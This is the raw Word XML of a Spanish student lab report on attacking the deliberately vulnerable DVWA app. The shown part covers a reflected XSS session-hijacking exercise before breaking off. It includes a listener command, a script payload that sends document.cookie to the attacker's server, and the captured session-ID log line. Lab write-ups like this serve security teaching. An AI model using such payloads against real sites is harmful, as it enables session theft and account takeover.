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0B7D2B"/>
    <w:p w14:paraId="540337DD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3C5A"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>INFORME #1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3C5A"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3C5A"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Gestión de Vulnerabilidades en Aplicaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA65D4"/>
    <w:p w14:paraId="6A6E610D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>DVWA: XSS Reflejado | XSS Almacenado | Upload Backdoor | CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A1CC16"/>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7EA3D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shd w:val="clear" w:color="auto" w:fill="2E4057"/>
          </w:tcPr>
          <w:p w14:paraId="50699E5D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Campo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2E4057"/>
          </w:tcPr>
          <w:p w14:paraId="1305AE80">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0744D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8A5A73F">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Asignatura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="324932DB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gestión de Vulnerabilidades en Aplicaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="436EC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942B127">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Programa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A4849A9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Especialización en Ciberseguridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52477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8692D0B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Docente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FDEC273">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Javier Mauricio Durán Vásquez</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3E4DE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D4BCEE9">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Estudiante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357F9DC3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Daniel Alejandro Aguirre Ceballos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0F485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C57DFD7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Entorno</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F84B795">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kali Linux + Metasploitable (DVWA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60D41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42ACA46">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fecha</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="594E0086">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>28 de febrero de 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6AEE3789"/>
    <w:p w14:paraId="0A241437">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1E3C5A"/>
        </w:rPr>
        <w:t>Entorno de trabajo</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66129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0AE8C12">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Atacante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2081B6DB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Kali Linux — IP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — Prompt: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>@kali:~$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1456A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210765D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Víctima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="627BF922">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploitable con DVWA — IP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:sz w:val="20"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="71018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1D1AA9D">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nivel DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38E6BDE6">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="59C02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DC68FC5">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Herramientas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EB00EAD">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Firefox, Netcat, msfvenom, Weevely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31030287"/>
    <w:p w14:paraId="5F829086">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="B41E1E"/>
        </w:rPr>
        <w:t>Vulnerabilidad 1 — XSS Reflejado (Cross-Site Scripting Reflected)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62926E0A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552ECDFE">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El XSS Reflejado es una vulnerabilidad en la que el atacante inyecta código JavaScript malicioso en un parámetro de la solicitud HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24294E47">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F87900">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B6AD3">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFBFC73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de entradas y salidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B526C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>3. Mecanismo de ataque — Robo de cookie y secuestro de sesión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FB553">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: Robar la cookie de sesión de la víctima y cargarla en el navegador del atacante para iniciar sesión sin credenciales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750A7EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EF0D98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Activar Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0D8405">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Activamos el listener en la consola de kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2165223C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>python3 -m http.server 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DF634">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FF59552">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>— Payload XSS para robar cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F63FC92">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4019550" cy="2512060"/>
            <wp:effectExtent l="12700" t="12700" r="21590" b="2032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pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4019550" cy="2512060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                    <a:ln w="12700" cmpd="sng">
                      <a:solidFill>
                        <a:schemeClr val="accent1">
                          <a:shade val="50000"/>
                        </a:schemeClr>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167F806">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Imagen1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>formulario inicial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BBBDF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Utilizamos el siguiente payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC4A286">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>&lt;script&gt;new Image().src="http://127.0.0.1:8888/?c="+document.cookie;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF0FF55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D35DE89">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4948555" cy="3093085"/>
            <wp:effectExtent l="0" t="0" r="4445" b="63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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4948555" cy="3093085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E0D024">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Imagen2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obtener cookie en la terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608CF0C4">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Recepción de la cookie en el listener del atacante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3E1853">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> - "GET /?cookie=PHPSESSID=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>18ff22346f0f579ba5604b1bc150c45f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A4B0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Inyección de cookie en el navegador atacante (consola F12):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4136EF">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5093335" cy="3183255"/>
            <wp:effectExtent l="0" t="0" r="12065" b="190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a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5093335" cy="3183255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DE001">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
